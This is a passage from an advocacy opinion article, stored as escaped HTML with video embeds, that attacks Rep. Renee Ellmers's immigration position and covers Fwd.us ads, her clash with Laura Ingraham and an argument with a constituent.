Renee Ellmers<\/a> (R-N.C.) for her support of granting legal status to illegal aliens. While <a href=\"http:\/\/www.fayobserver.com\/opinion\/news_columns\/article_c0799c68-2bad-5566-b02e-d4b57a749eb6.html\">Rep. Ellmers denies<\/a> that she supports \u201ca pathway to citizenship or amnesty,\u201d she has explicitly backed providing legal status to illegal aliens, after which they may apply for naturalization, which of course, is a pathway to citizenship.<b><\/b><\/p>\n<p>Since its founding last April, Fwd.us, through its subsidiary \u201c<a href=\"http:\/\/www.businessinsider.com\/mark-zuckerberg-conservatives-immigration-reform-2013-4\">Americans for a Conservative Direction<\/a>,\u201d its \u201c<a href=\"http:\/\/www.politico.com\/story\/2013\/04\/mark-zuckerberg-immigration-group-launches-tv-blitz-90511.html\">conservative<\/a>\u201d arm, has been running ads to bolster support for Republican amnesty proponents among Republican voters.\u00a0Meanwhile, Fwd.us\u2019s other subsidiary, \u201cThe Council for American Job Growth,\u201d runs ads <a href=\"http:\/\/techcrunch.com\/2014\/03\/03\/zuckerberg-linked-group-releases-ad-blasting-house-gop-for-immigration-reform-intransigence\/\">critical of Republicans<\/a> for failing to pass immigration bills. These ads are meant to influence Democratic or independent voters. In this latest ad, Fwd.us touts Rep. Ellmers as \u201ca conservative fighter for North Carolina\u201d who is \u201cworking hard to secure the border and fix our broken immigration system once and for all. No amnesty, period.\u201d<\/p>\n<p><iframe loading=\"lazy\" src=\"\/\/www.youtube.com\/embed\/clHdtRrjF4E\" height=\"315\" width=\"560\" allowfullscreen=\"\" frameborder=\"0\"><\/iframe><\/p>\n<p>True immigration reformers, inside and outside of Rep. Ellmers\u2019 district, have criticized the congresswoman for her open borders position on immigration.\u00a0 Earlier this month, amnesty opponent Laura Ingraham engaged Ellmers in a <a href=\"http:\/\/www.breitbart.com\/Big-Government\/2014\/03\/13\/Renee-Ellmers-thinks-for-herself-Congresswoman-calls-Ingraham-ignorant-small-minded-in-Pro-Amnesty-Meltdown\">spirited immigration debate <\/a>on her radio show. The clash began when Ingraham asked Ellmers about immigration, mentioning that her opponent Frank Roche in the upcoming Republican primary was emphasizing the issue. When Ellmers insisted that she did not support amnesty, but she did support legal status for illegal aliens because the immigration system is \u201cbroken,\u201d Ingraham accused her of repeating a \u201cliberal line\u201d that is \u201crepeated by all your enemies.\u201d Responding to Ellmers\u2019 invocation of legalization as necessary to avoid \u201cde facto amnesty,\u201d Ingraham asked her, \u201cYou realize La Raza wrote that line?\u201d Towards the end of the interview, Rep. Ellmers told Ingraham that her position was \u201cignorant.\u201d<\/p>\n<p>Two days after her radio show appearance, Rep. Ellmers claimed that her opponent was misrepresenting her as supporting \u201camnesty\u201d or \u201ca path to citizenship.\u201d (<i>See<\/i>\u00a0the clip below.)\u00a0She then \u201cclarified\u201d her position by stating that her position was the same as that of Senators Ted Cruz (R-Texas), Mike Lee (R-Utah), Rand Paul (R-Ky.), Dr. Ben Carson, and the National Federation of Republican Women, though they do not all hold the same position on immigration.<\/p>\n<p><iframe loading=\"lazy\" src=\"\/\/player.vimeo.com\/video\/89435816?title=0&amp;byline=0&amp;portrait=0\" height=\"281\" width=\"500\" allowfullscreen=\"\" frameborder=\"0\"><\/iframe><\/p>\n<p>Finally, last Friday, not quite a week after she last tried to \u201cclarify\u201d her immigration position, Rep. Ellmers got into a <a href=\"http:\/\/www.breitbart.com\/Big-Government\/2014\/03\/22\/Ellmers-Berates-Constituents-for-Opposing-Amnesty\">screaming match<\/a> over immigration <a href=\"http:\/\/www.slate.com\/blogs\/weigel\/2014\/03\/24\/congresswoman_yells_at_constituent_in_the_worst_shot_political_video_of.html\">with a constituent<\/a>, whom she berated as consumed with \u201cvitriol and hatred\u201d and talking \u201cwithout any damn facts.\u201d The constituent, Ron Woodard, is the head of the North Carolina non-profit organization, <a href=\"http:\/\/nclisten.com\/\">NC Listen<\/a>, which advocates lower immigration levels and rejects amnesty. Woodard wrote of how much trouble he went through to set up the meeting and how disappointed he was by his reception on <a href=\"http:\/\/www.conservativehq.com\/article\/16740-report-arrogance-power\">ConservativeHQ.com<\/a>. \u201cI asked her why she was for giving legal work permits to illegal immigrants when we have 20 million citizens in the USA who are either unemployed or are working part-time but want and cannot find a full-time job\u2026she never would answer that question.\u201d<\/p>\n<p>Representative Ellmers\u2019 altercation with Ingraham and its aftermath underscores how amnesty proponents want to redefine the terms of the immigration debate. Black\u2019s Law Dictionary defines amnesty as \u201ca pardon extended by the government to a group or class of persons,\u201d and specifically cites the 1986 Immigration Reform and Control Act as an example. Therefore, any act of legalization, even if a nominal fine were included, would in fact be an amnesty for illegal aliens.
